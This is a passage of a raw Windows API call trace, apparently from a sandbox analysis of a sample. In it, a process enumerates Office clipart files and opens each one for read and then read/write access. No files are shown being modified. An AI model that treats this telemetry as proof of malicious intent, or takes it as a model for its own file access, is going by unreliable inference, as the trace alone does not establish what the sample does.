office\\root\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.259] GetFileType (hFile=0x33c) returned 0x1 [0104.259] CloseHandle (hObject=0x33c) returned 1 [0104.259] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f08)) returned 1 [0104.259] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2942, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EXPLR_01.MID", cAlternateFileName="")) returned 1 [0104.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID", lpUsedDefaultChar=0x0) returned 69 [0104.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.260] GetFileType (hFile=0x33c) returned 0x1 [0104.260] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.260] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.261] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.261] CloseHandle (hObject=0x33c) returned 1 [0104.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.261] GetFileType (hFile=0x33c) returned 0x1 [0104.261] CloseHandle (hObject=0x33c) returned 1 [0104.261] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2942)) returned 1 [0104.261] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ee, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FALL_01.MID", cAlternateFileName="")) returned 1 [0104.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID", lpUsedDefaultChar=0x0) returned 68 [0104.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.262] GetFileType (hFile=0x33c) returned 0x1 [0104.262] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.262] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.262] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.262] CloseHandle (hObject=0x33c) returned 1 [0104.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.262] GetFileType (hFile=0x33c) returned 0x1 [0104.262] CloseHandle (hObject=0x33c) returned 1 [0104.262] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ee)) returned 1 [0104.263] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00074_.WMF", cAlternateFileName="")) returned 1 [0104.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.264] GetFileType (hFile=0x33c) returned 0x1 [0104.264] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.264] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.264] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.264] CloseHandle (hObject=0x33c) returned 1 [0104.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.264] GetFileType (hFile=0x33c) returned 0x1 [0104.264] CloseHandle (hObject=0x33c) returned 1 [0104.264] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45ba)) returned 1 [0104.264] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2eda, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00076_.WMF", cAlternateFileName="")) returned 1 [0104.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.265] GetFileType (hFile=0x33c) returned 0x1 [0104.265] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.265] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.265] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.265] CloseHandle (hObject=0x33c) returned 1 [0104.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.265] GetFileType (hFile=0x33c) returned 0x1 [0104.265] CloseHandle (hObject=0x33c) returned 1 [0104.265] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2eda)) returned 1 [0104.265] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7620, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00077_.WMF", cAlternateFileName="")) returned 1 [0104.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.266] GetFileType (hFile=0x33c) returned 0x1 [0104.266] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.266] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.266] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.266] CloseHandle (hObject=0x33c) returned 1 [0104.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.266] GetFileType (hFile=0x33c) returned 0x1 [0104.266] CloseHandle (hObject=0x33c) returned 1 [0104.266] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7620)) returned 1 [0104.266] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x721c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00086_.WMF", cAlternateFileName="")) returned 1 [0104.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.267] GetFileType (hFile=0x33c) returned 0x1 [0104.267] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.267] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.267] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.267] CloseHandle (hObject=0x33c) returned 1 [0104.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.267] GetFileType (hFile=0x33c) returned 0x1 [0104.267] CloseHandle (hObject=0x33c) returned 1 [0104.267] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x721c)) returned 1 [0104.268] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3772, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00090_.WMF", cAlternateFileName="")) returned 1 [0104.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.268] GetFileType (hFile=0x33c) returned 0x1 [0104.268] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.268] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.268] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.268] CloseHandle (hObject=0x33c) returned 1 [0104.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.268] GetFileType (hFile=0x33c) returned 0x1 [0104.269] CloseHandle (hObject=0x33c) returned 1 [0104.269] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3772)) returned 1 [0104.269] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc55757, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc55757, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x920e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00096_.WMF", cAlternateFileName="")) returned 1 [0104.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.395] GetFileType (hFile=0x27c) returned 0x1 [0104.395] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.395] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.395] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.395] CloseHandle (hObject=0x27c) returned 1 [0104.395] AreFileApisANSI () returned 1 [0104.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.395] GetFileType (hFile=0x27c) returned 0x1 [0104.395] CloseHandle (hObject=0x27c) returned 1 [0104.395] AreFileApisANSI () returned 1 [0104.395] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc55757, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc55757, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x920e)) returned 1 [0104.396] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc55757, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc55757, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3df0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD00296_.WMF", cAlternateFileName="")) returned 1 [0104.396] AreFileApisANSI () returned 1 [0104.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft 